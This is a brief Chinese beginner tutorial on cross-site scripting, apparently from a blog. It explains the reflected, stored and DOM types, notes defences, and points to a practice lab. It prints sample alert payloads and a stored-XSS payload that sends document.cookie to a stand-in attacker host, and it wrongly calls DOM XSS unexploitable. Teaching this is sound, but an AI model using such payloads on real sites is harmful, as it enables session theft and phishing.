XSS漏洞(hw从零开始)

xss漏洞介绍

XSS,即跨站脚本攻击,是指攻击者利用Wb服务器中的代码漏洞,在页面中嵌入客户端脚
本(通常是一段由avaScript编写的恶意代码),当信任此Web服务器的用户访问Web站点
中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目
的。

html和css和js的区别

 JS代码的一些弹窗

<script>alert(1)</script>        //弹出1
<script>alert(document.cookie)</script>        //单出当前cookie
<script>document.location = 'http://www.baidu.com'</script>         //跳转到百度
。。。(JS代码可以随便写想干嘛就干嘛)

XSS分类

1、反射型xss(低危)

经过服务器,但是刷新后消失

反射型xss,也称为非持久型xss,是最常见的一种xss

2、存储型xss(高危)

存储型xss也称为持久性xss,js代码会存在后台

漏洞位置:留言框、富文本编辑器、标签、反馈、用户资料

防护:过滤、编码、设置cookie的http only名单

3、DOM型xss(低危)

不能利用

DOM型xss,其实也是一种反射型,但是输入的语句不是js的语句,是DOM语法

 原理

 JS型弹窗

 

利用XSS进行攻击(存储型)

思考?

js代码如何编写呢?

攻击的目的

获取cookie,钓鱼

攻击实例步骤演示

第一步

黑客写入恶意代码

<script>document.location 'http://www.xxx.com/cookie.php?cookie='+document.cookie:</script>

第二步

用户访问黑客写入恶意代码的网站

第三步

登录xss漏洞接受平台查看

实战平台

GitHub - zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值